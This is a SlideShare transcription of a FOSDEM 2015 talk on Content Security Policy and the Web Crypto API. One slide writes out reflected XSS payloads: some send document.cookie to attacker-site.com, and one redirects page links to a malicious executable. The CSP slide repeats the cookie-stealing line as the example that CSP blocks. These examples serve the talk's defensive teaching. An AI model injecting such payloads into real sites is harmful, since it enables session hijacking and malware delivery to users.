SlideShare una empresa de Scribd logo

Web Security: CSP and Web Crypto

Samsung Open Source Group
Samsung Open Source Group
Software
1 de 44
Descargar para leer sin conexión
Web Security CSP and Web Cryptography Habib Virji Samsung Open Source Group habib.virji@samsung.com FOSDEM 2015
Agenda Why Web Security Cross site scripting Content security policy (CSP) CSP Directives and reporting Shortcomings Next Step Web Cryptography Introduction Web Crypto usage Next Step Conclusion
Content Security Policy (CSP)
Why Web Security Main threats as per OWASP1 are: Injection Broken authentication and session management Cross-site scripting Insecure direct object references Security misconfiguration. Sensitive data exposure Missing function level access control Cross site request forgery (CSRF). Components usage with known vulnerability. Unvalidated redirects and forwards. 1 OWASP: https://www.owasp.org/index.php/Top 10 2013-Top 10
Cross site scripting (XSS) Same-origin policy Main reliance of security: scripts running should originate from the same site. protocol://host:port
Cross site scripting (XSS) Same-origin policy Main reliance of security: scripts running should originate from the same site. protocol://host:port Same-origin policy is important for cookies which store sensitive information and user authentication details.
Cross site scripting (XSS) Same-origin policy Main reliance of security: scripts running should originate from the same site. protocol://host:port Same-origin policy is important for cookies which store sensitive information and user authentication details. Cross-site scripting (XSS) Cross-site-scripting(XSS) breaks reliance on same origin security. XSS can inject client side scripts in web page. Reflected - Including inside query JavaScript code, which can process and pass back information. Persistent - This persists on the server and information is sent back to the server.
XSS in action Reflected XSS: http://vulnerable-site.com/index.php?user= %3Cscript%3E window.onload = function() { var Links=document.getElementsByTagName(’a’); Links[0].href = ’http://attacker-site.com/malicious.exe’; } %3Cscript%3E %3Cscript%3E window.open(’http://www.attacker-site.com/collect?cookie=’+document.cookie); %3Cscript%3E new Image(’http://www.attacker-site.com/collect?cookie=’+document.cookie) (IBAN: 978-1597496049)
Content-Security-Policy Solution to XSS with comprehensive solutions. HTTP response header set by origin/server to control/specify from where resources can be loaded. Origin site enforces static policies.
Content-Security-Policy Solution to XSS with comprehensive solutions. HTTP response header set by origin/server to control/specify from where resources can be loaded. Origin site enforces static policies. Benefits from CSP: Separates code and data. Stop XSS and code injection via setting whitelist of allowable content and sources.
Content-Security-Policy Solution to XSS with comprehensive solutions. HTTP response header set by origin/server to control/specify from where resources can be loaded. Origin site enforces static policies. Benefits from CSP: Separates code and data. Stop XSS and code injection via setting whitelist of allowable content and sources. Each page header has to set separate policy set.
How CSP protects from XSS content-security-policy: connect-src ’self’ <script> window.open(http://www.attacker-site.com/collect? cookie=+document.cookie); </script> Error in console: Refused to connect to ’http://www.attacker-site.com/’ because it violates the document’s Content Security Policy directive: "connect-src ’self’".
CSP Directives script-src: All eval and inline-script are stopped. style-src: All inline style are stopped. object-src: Source of flash source and other plugin object. image-src: Origins of images. font-src: font files. connect-src: Source for WebSocket/XHR/EventSource frame-src: Iframes source for embedding YouTube media-src: Source for Video and Audio default-src: All above. sandbox: Special directive to block everything. Access via allow-scripts, allow-forms
CSP Reporting CSP Reporting provides a way of getting informed if some violation has been done. content-security-policy: default-src: ’self’; report-uri: /myreport Following report will be auto-generated and sent to the server when invalid access is done: {"csp-report": { "document-uri": "http://example.org/page.html", "referrer": "http://evil.example.com/", "blocked-uri": "http://evil.example.com/evil.js", "violated-directive": "default-src ’self’", "original-policy": "default-src ’self’, "report-uri" "http://example.org/myreport" } }
CSP Reporting CSP Reporting provides a way of getting informed if some violation has been done. content-security-policy: default-src: ’self’; report-uri: /myreport Following report will be auto-generated and sent to the server when invalid access is done: {"csp-report": { "document-uri": "http://example.org/page.html", "referrer": "http://evil.example.com/", "blocked-uri": "http://evil.example.com/evil.js", "violated-directive": "default-src ’self’", "original-policy": "default-src ’self’, "report-uri" "http://example.org/myreport" } } Instead of moving full site to blocking other origins. content-security-policy-report-only: default-src: ’self’
CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. Enforcement breaks important extensions present in the browser.3 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. Enforcement breaks important extensions present in the browser.3 Require changing structure of their site.3 Dynamically named sub-domains also stops websites using CSP features.4 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
CSP shortcoming Main issue with adaptation is blocking in-line JavaScript.2 Browser bugs and incompatibility breaks site.3 IE supports CSP via different header X-Content-Security-Policy header. Enforcement breaks important extensions present in the browser.3 Require changing structure of their site.3 Dynamically named sub-domains also stops websites using CSP features.4 Requires compliance across all web application from same origin.4 2 https://blog.twitter.com/2013/csp-to-the-rescue-leveraging-the-browser- for-security 3 http://threatpost.com/content-security-policy-mitigates-xss-breaks- websites/107270 4 http://mweissbacher.com/publications/csp raid.pdf
CSP Next Step - Inline script What it addresses: content-security-policy: script-src ’self’
CSP Next Step - Inline script What it addresses: content-security-policy: script-src ’self’ CSP made it mandatory not to include inline JavaScript but in all JavaScript in a separate file. Required using unsafe-inline, to allow inline JavaScript to execute. Several sites failed to adapt CSP such as Twitter.2
CSP Next Step - Inline script What it addresses: content-security-policy: script-src ’self’ CSP made it mandatory not to include inline JavaScript but in all JavaScript in a separate file. Required using unsafe-inline, to allow inline JavaScript to execute. Several sites failed to adapt CSP such as Twitter.2 New mechanism handle inline JavaScript by setting nonce or hash values.
CSP Next Step - Inline script Nonce mechanism: {content-security-policy: script-src: ’9253884’ } <script nonce="9253884"> doStuff(); </script> Challenges:5 New nonce is expected and no reuse of nonce. Support in the framework. 5 https://docs.google.com/presentation/d/12JxuNy92C6ARrlsGaykXW5PcD0PKmU1VBNtXyxaePZ4
CSP Next Step - Inline script Nonce mechanism: {content-security-policy: script-src: ’9253884’ } <script nonce="9253884"> doStuff(); </script> Challenges:5 New nonce is expected and no reuse of nonce. Support in the framework. Hashing mechanism: {content-security-policy: script-src: ’sha256-67134...287d7a’ } <script> doStuff(); </script> Challenges:5 New hash for every change. Dynamic content handling. 5 https://docs.google.com/presentation/d/12JxuNy92C6ARrlsGaykXW5PcD0PKmU1VBNtXyxaePZ4
CSP Next Step - SubResource Integrity Instead of securing whole page, secure resources. Fetched resource is reached without any manipulation when hosted at other origin.
CSP Next Step - SubResource Integrity Instead of securing whole page, secure resources. Fetched resource is reached without any manipulation when hosted at other origin. <script src="https://legible.com/script.js" noncanonical-src="http://insecure.net/script.js" integrity="ni:///sha-256; asijfiqu4t12...woeji3W?ct=application/javascript"> </script>
CSP Next Step - Per-page Suborigins Sites segregate contents into separate flexible synthetic origins. The synthetic origins should be related to the main origin. Content in synthetic origin can interact via postMessage. End user sees content coming from a single origin content-security-policy: suborigin ’<name>’ protocol://name@host:port
Web Cryptography
Introduction JavaScript API’s to perform cryptographic operations such as Hashing Signature generation and verification. Encryption and decryption Derive keys and bits
Introduction JavaScript API’s to perform cryptographic operations such as Hashing Signature generation and verification. Encryption and decryption Derive keys and bits Uses 4 interfaces: RandomSource, CryptoKey, SubtleCrypto and WorkerCrypto.
Introduction JavaScript API’s to perform cryptographic operations such as Hashing Signature generation and verification. Encryption and decryption Derive keys and bits Uses 4 interfaces: RandomSource, CryptoKey, SubtleCrypto and WorkerCrypto. Different key format supported are: {”raw”, ”spki”, ”pkcs8”, ”jwk”}
Web Cryptography Algorithms Digest SHA-1/256/384/512 GenerateKey RSASSA-PKCS1-v1 5, RSA-PSS/OAEP, AES-CTR/CBC/CMAC/GCM/CFB/KW, ECDSA, HMAC, DH, PBKDF2 Import/Export RSASSA-PKCS1-v1 5, RSA-PSS/OAEP, AES-CTR/CBC/CMAC/GCM/CFB/KW, HMAC, DH, PBKDF2, CONCAT HKDF-CTR, ECDSA, ECDH Sign/Verify RSASSA-PKCS1-v1 5, RSA-PSS, ECDSA, AES-CMAC, HMAC Encrypt/Decrypt RSA-OAEP, AES-CTR/CBC/GCM/CFB DeriveBits/Key ECDH, DH, CONCAT, HKDF-CTR, PBKDF2 Wrap/Unwrap RSA-OAEP, AES-CTR/CBC/GCM/CFB/KW
Use Case6 Multi-factor authentication for user or service. Protected document exchange Cloud storage Document or code signing Confidentiality and integrity of communication. JavaScript object signing and encryption (JOSE). 6 http://www.w3.org/TR/WebCryptoAPI/
Digest - SHA-256 var userInput = "Integrity example"; var typedArray = new Uint8Array(userInput.length); for (var i=0; i<userInput.length; i++) typedArray[i]=userInput.charCodeAt(i); var promise = crypto.subtle.digest( {name:"SHA-256"}, typedArray); promise.then(function(dgst){ console.log(bytesToHexString(dgst)); });
Digest - SHA-256 var userInput = "Integrity example"; var typedArray = new Uint8Array(userInput.length); for (var i=0; i<userInput.length; i++) typedArray[i]=userInput.charCodeAt(i); var promise = crypto.subtle.digest( {name:"SHA-256"}, typedArray); promise.then(function(dgst){ console.log(bytesToHexString(dgst)); }); function bytesToHexString(bytes) { bytes = new Uint8Array(bytes); var hexBytes = []; for (var i = 0; i < bytes.length; ++i) { var byteString=bytes[i].toString(16); if (byteString.length < 2) byteString = "0" + byteString; hexBytes.push(byteString); } return hexBytes.join(""); }
Key Generation - HMAC var promise = crypto.subtle.generateKey( {name: "hmac", hash: {name: "sha-256"}},// Algorithm true, // Extractable ["sign", "verify"]); // KeyUsage promise.then(function(key) { console.log(key.type); // secret console.log(key.usages); // sign, verify console.log(key.algorithm.name); // HMAC console.log(key.algorithm.hash.name); // SHA-256 console.log(key.algorithm.length); // 512 });
Sign & Verify - HMAC var promise = crypto.subtle.sign( {name:"HMAC"}, key, typedArray); promise.then(function(mac){ console.log(bytesToHexString(mac)); }); var verify = crypto.subtle.verify( {name:"HMAC"}, key, mac, typedArray); verify.then(function(verified){ console.log(verified); // true or false });
Encrypt & Decrypt - AES-CBC var promise = crypto.subtle.importKey( ’raw’, keyData, {’name’:’aes-cbc’, iv: initialVector}, false, [’encrypt’, ’decrypt’]); var encypt = promise.then(function(key) { crypto.subtle.encrypt( {’name’:’aes-cbc’, iv: initialVector}, key, plainText)}); encrypt.then( function(ct) { console.log(new Uint8Array(ct)); });
Encrypt & Decrypt - AES-CBC var promise = crypto.subtle.importKey( ’raw’, keyData, {’name’:’aes-cbc’, iv: initialVector}, false, [’encrypt’, ’decrypt’]); var encypt = promise.then(function(key) { crypto.subtle.encrypt( {’name’:’aes-cbc’, iv: initialVector}, key, plainText)}); encrypt.then( function(ct) { console.log(new Uint8Array(ct)); }); var decrypt = crypto.subtle.decrypt( {’name’:’aes-cbc’, iv: initialVector}, key, ct) ); decrypt.then( function(byte){ var b = new Uint8Array(byte); var decrypt = ""; for (var i=0;i<b.byteLength;i++) decrypt += String.fromCharCode(b[i]); console.log(decrypt); });
DeriveKey/DeriveBits var promise = crypto.subtle.importKey( "raw", hexStringToUint8Array(kHkdfKey), {name: "HKDF"}, true, [’deriveKey’, ’deriveBits’]); promise.then(function(key) { var deriveBit = crypto.subtle.deriveBit( {name: "HKDF", hash: "SHA-256", salt: new Uint8Array(), info: new Uint8Array()}, key, 0); deriveBit.then(function(mac) { console.log(bytesToHexString(result)); }); });
Next Steps Main area of focus in next revision of WebCrypto.7 Multi-factor authentication Authentication mechanism should be standardized. Hardware token as way of authorization. Secure element access. Right level of abstraction to make key available outside browser. Handling different keys: User Key, Service Key, Platform Key and Device Keys. Key material should be available outside browser environment and bound to a local authenticator. Ability to verify source of the key i.e. attestation provenance. 7 http://www.w3.org/2012/webcrypto/webcrypto-next-workshop/
Conclusion CSP and Web Crypto are two separate Web Security mechanism. JavaScript code needs to be verifiable, to trust origin with ”remote code execution”. CSP provide white-listing your script code and WebCrypto provides way of securing your data. CSP adoption might take time, but its usage might reflect in top alexa sites. Hardware token with authentication simplification will improve user authentication. Key management and retrieval across platform is going to be big boost for Web Crypto adoption.
Thank you.

Recomendados

Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security PolicyMarkus Wichmann
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Securing your EmberJS Application
Securing your EmberJS ApplicationSecuring your EmberJS Application
Securing your EmberJS ApplicationPhilippe De Ryck
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 

Recomendados

Preventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyPreventing XSS with Content Security Policy
Preventing XSS with Content Security PolicyKsenia Peguero
 
W3C Content Security Policy
W3C Content Security PolicyW3C Content Security Policy
W3C Content Security PolicyMarkus Wichmann
 
Content Security Policy
Content Security PolicyContent Security Policy
Content Security PolicyRyan LaBouve
 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web AppsFrank Kim
 
Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Defeating Cross-Site Scripting with Content Security Policy (updated)
Defeating Cross-Site Scripting with Content Security Policy (updated)Francois Marier
 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptFrancois Marier
 
Securing your EmberJS Application
Securing your EmberJS ApplicationSecuring your EmberJS Application
Securing your EmberJS ApplicationPhilippe De Ryck
 
Securing your AngularJS Application
Securing your AngularJS ApplicationSecuring your AngularJS Application
Securing your AngularJS ApplicationPhilippe De Ryck
 
Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Francois Marier
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Francois Marier
 
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudJavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudArun Gupta
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2Zero Science Lab
 
http security response headers for web security
http security response headers for web securityhttp security response headers for web security
http security response headers for web securityOlatunji Adetunji
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do sE Hacking
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...Matt Raible
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Matt Raible
 
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...Matt Raible
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeScott Helme
 
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 202010 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020Matt Raible
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache Tomcat
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache TomcatCase Study: Migrating Hyperic from EJB to Spring from JBoss to Apache Tomcat
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache TomcatVMware Hyperic
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
Content Security Policy (CSP)
Content Security Policy (CSP)Content Security Policy (CSP)
Content Security Policy (CSP)Arun Kumar
 
Content-Security-Policy 2018.0
Content-Security-Policy 2018.0Content-Security-Policy 2018.0
Content-Security-Policy 2018.0Philippe Gamache
 
Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaultsMatias Korhonen
 

Más contenido relacionado

La actualidad más candente

Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Francois Marier
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Philippe De Ryck
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Francois Marier
 
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudJavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudArun Gupta
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2Zero Science Lab
 
http security response headers for web security
http security response headers for web securityhttp security response headers for web security
http security response headers for web securityOlatunji Adetunji
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do sE Hacking
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...Matt Raible
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Matt Raible
 
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...Matt Raible
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeScott Helme
 
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 202010 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020Matt Raible
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsSimon Willison
 
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache Tomcat
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache TomcatCase Study: Migrating Hyperic from EJB to Spring from JBoss to Apache Tomcat
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache TomcatVMware Hyperic
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13drewz lin
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationSandro Gauci
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfdrewz lin
 
Content Security Policy (CSP)
Content Security Policy (CSP)Content Security Policy (CSP)
Content Security Policy (CSP)Arun Kumar
 
Content-Security-Policy 2018.0
Content-Security-Policy 2018.0Content-Security-Policy 2018.0
Content-Security-Policy 2018.0Philippe Gamache
 

La actualidad más candente (20)

Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015Security and Privacy on the Web in 2015
Security and Privacy on the Web in 2015
 
Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)Are you botching the security of your AngularJS applications? (DevFest 2016)
Are you botching the security of your AngularJS applications? (DevFest 2016)
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
 
Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016Security and Privacy on the Web in 2016
Security and Privacy on the Web in 2016
 
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the CloudJavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
JavaOne India 2011 - Running your Java EE 6 Apps in the Cloud
 
CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2CloudFlare vs Incapsula: Round 2
CloudFlare vs Incapsula: Round 2
 
http security response headers for web security
http security response headers for web securityhttp security response headers for web security
http security response headers for web security
 
Owasp universal-http-do s
Owasp universal-http-do sOwasp universal-http-do s
Owasp universal-http-do s
 
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
10 Excellent Ways to Secure Your Spring Boot Application - The Secure Develop...
 
Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021Web App Security for Java Developers - PWX 2021
Web App Security for Java Developers - PWX 2021
 
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...
Lock That Shit Down! Auth Security Patterns for Apps, APIs, and Infra - Sprin...
 
Content Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army KnifeContent Security Policy - The application security Swiss Army Knife
Content Security Policy - The application security Swiss Army Knife
 
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 202010 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020
10 Excellent Ways to Secure Spring Boot Applications - Okta Webinar 2020
 
When Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentalsWhen Ajax Attacks! Web application security fundamentals
When Ajax Attacks! Web application security fundamentals
 
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache Tomcat
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache TomcatCase Study: Migrating Hyperic from EJB to Spring from JBoss to Apache Tomcat
Case Study: Migrating Hyperic from EJB to Spring from JBoss to Apache Tomcat
 
Phu appsec13
Phu appsec13Phu appsec13
Phu appsec13
 
Web Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And ExploitationWeb Application Firewalls Detection, Bypassing And Exploitation
Web Application Firewalls Detection, Bypassing And Exploitation
 
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolfDefeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
Defeating xss-and-xsrf-with-my faces-frameworks-steve-wolf
 
Content Security Policy (CSP)
Content Security Policy (CSP)Content Security Policy (CSP)
Content Security Policy (CSP)
 
Content-Security-Policy 2018.0
Content-Security-Policy 2018.0Content-Security-Policy 2018.0
Content-Security-Policy 2018.0
 

Similar a Web Security: CSP and Web Crypto

Content Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooContent Security Policy - Lessons learned at Yahoo
Content Security Policy - Lessons learned at YahooBinu Ramakrishnan
 
Rails security: above and beyond the defaults
Rails security: above and beyond the defaultsRails security: above and beyond the defaults
Rails security: above and beyond the defaultsMatias Korhonen
 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesBrad Hill
 
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers
AppSec Tel Aviv - OWASP Top 10 For JavaScript Developers Lewis Ardern
 
HTTP_Header_Security.pdf
HTTP_Header_Security.pdfHTTP_Header_Security.pdf
HTTP_Header_Security.pdfksudhakarreddy5
 
Csp and http headers
Csp and http headersCsp and http headers
Csp and http headersdevObjective
 
Protecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environmentProtecting Web App users in today’s hostile environment
Protecting Web App users in today’s hostile environmentajitdhumale
 
A Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsA Practical Guide to Securing Modern Web Applications
A Practical Guide to Securing Modern Web ApplicationsManish Shekhawat
 
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...CONFidence 2018: Defense-in-depth techniques for modern web applications and ...
CONFidence 2018: Defense-in-depth techniques for modern web applications and ...PROIDEA
 
Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Top 10 Web Security Vulnerabilities (OWASP Top 10)
Top 10 Web Security Vulnerabilities (OWASP Top 10)Brian Huff
 
Owasp web application security trends
Owasp web application security trendsOwasp web application security trends
Owasp web application security trendsbeched
 
[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar Ganiev[2.1] Web application Security Trends - Omar Ganiev
[2.1] Web application Security Trends - Omar GanievOWASP Russia
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Penetration Testing Report
Penetration Testing ReportPenetration Testing Report
Penetration Testing ReportAman Srivastava
 
OWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersOWASP Portland - OWASP Top 10 For JavaScript Developers
OWASP Portland - OWASP Top 10 For JavaScript DevelopersLewis Ardern
 
OWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxOWASP_Top_Ten_Proactive_Controls_v2.pptx
OWASP_Top_Ten_Proactive_Controls_v2.pptxFernandoVizer
 
[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security Headers[Wroclaw #2] Web Application Security Headers
[Wroclaw #2] Web Application Security HeadersOWASP
 

Similar a Web Security: CSP and Web Crypto (20)

Content Security Policy - Lessons learned at Yahoo
